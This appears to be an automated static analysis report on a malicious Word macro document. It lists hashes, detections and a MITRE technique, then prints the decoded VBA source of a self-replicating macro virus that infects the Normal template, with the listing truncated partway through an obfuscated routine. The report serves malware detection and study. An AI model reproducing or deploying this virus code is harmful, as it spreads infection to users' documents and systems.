Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 069282f23e27e823…

MALICIOUS

Office (OLE)

Size: 59.5 KB
Created: 2000-09-09 11:42:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: e0742152c195158fedd080a7197be13e
SHA-1: c5c9f7b9a55db942d0c7148a61306df51a53cd33
SHA-256: 069282f23e27e8233032231726e5d22c86dd50f1de256c4017fbc18bebeb02cc
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Moothi-1'. Static analysis revealed the presence of VBA macros within the document. These macros are highly likely to be responsible for downloading and executing a secondary malicious payload, a common tactic for this type of threat.

Heuristics (2)

  • ClamAV: Doc.Trojan.Moothi-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Moothi-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 23897 bytes
SHA-256: 3993c346e52e1e5b256a785b587cffd636e7b9a2d8fbe01391f2c95cd6df12d8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'   __   __
'  |  | |  |
' _|__|_|__|_   ____      ____   _________   _________   _________   ____   ____   ___   ________
'/           \ /    \    /    \ /         \ /         \ /         \ /    \ /    \ /   \ /        \
'|   ________| |     \  /     | |   ___   | |   ___   | |         | |    | |    | |   | |   _____/
'|  |          |      \/      | |  /   \  | |  /   \  | |         | |    | |    | \___/ |   |
'|  |________  |              | |  |   |  | |  |   |  | |__     __| |    |_|    |  ___  |   |__
'|           \ |              | |  |   |  | |  |   |  |    |   |    |           | |   | |      |
'|______     | |    |\  /|    | |  |   |  | |  |   |  |    |   |    |     _     | |   | |    __|
'       |    | |    | \/ |    | |  |   |  | |  |   |  |    |   |    |    | |    | |   | |   |
' ______|    | |    |    |    | |  \___/  | |  \___/  |    |   |    |    | |    | |   | |   |____
'|           | |    |    |    | |         | |         |    |   |    |    | |    | |   | |        \
'\___________/ \____/    \____/ \_________/ \_________/    \___/    \____/ \____/ \___/ \________/
'  |  | |  |                                                - $MOOTHiE Da HuStla [ZeroGravity]
'  |__| |__|                                                - August 15, 2000
'
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*

'Virus Creation: 09/09/00 13.39.36
$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'$*  Poly       = Yes           $*
'$*  Retro      = Yes           $*
'$*  Stealth    = High          $*
'$*  Infection  = New           $*
'$*  Payload    = Save          $*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$

|-----====== CODE Starts ======-----|

Private Sub Document_New()
On Error Resume Next
Call Poly1
'Author:   Doctor Rave
'Name:     Birgit2001
'Comments: This is not a troja
'Origin:   Germany
'This Word2000 virus was created using $MOOTHiE Da HuStla's Macro Virus Creator 2000 Ver 2.0

On Error Resume Next: Randomize
Dim XXX1 As Object, XXX2 As Object, XXX3 As Object, XXX4 As Object, XXX5 As Object
Dim YYY1 As Object, YYY2 As Object, YYY3 As Object, YYY4 As Object, YYY5 As Object
Set XXX1 = ActiveDocument: Set XXX2 = XXX1.VBProject: Set XXX3 = XXX2.VBComponents: Set XXX4 = XXX3.Item(1): Set XXX5 = XXX4.CodeModule
Set YYY1 = NormalTemplate: Set YYY2 = YYY1.VBProject: Set YYY3 = YYY2.VBComponents: Set YYY4 = YYY3.Item(1): Set YYY5 = YYY4.CodeModule

AAA = YYY5.CountOfLines: BBB = XXX5.CountOfLines: CCC = Chr(Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65)

If AAA < BBB Then
For XXX = 1 To AAA: NT5.replaceline XXX, CCC: Next XXX
For XXX = 1 To BBB: XXXA = XXX5.Lines(XXX, 1): YYY5.Insertlines XXX, XXXA: Next XXX
NormalTemplate.Save: End If


If BBB < AAA Then
For XXX = 1 To BBB: XXX5.replaceline XXX, CCC: Next XXX
For XXX = 1 To AAA: XXXA = YYY5.Lines(XXX, 1): XXX5.Insertlines XXX, XXXA: Next XXX
ActiveDocument.Save: End If
Call Retro
End Sub

Sub FileSave()
On Error Resume Next
MsgBox "You have been infected by the Birgit2001 virus!"
ActiveDocument.Save 'Actual Save Command
End Sub


Private Sub Retro()
On Error Resume Next: h$ = Chr(99) & Chr(58) & Chr(92) & Chr(97) & Chr(117) & Chr(116) & Chr(111) & Chr(101) & Chr(
... (truncated)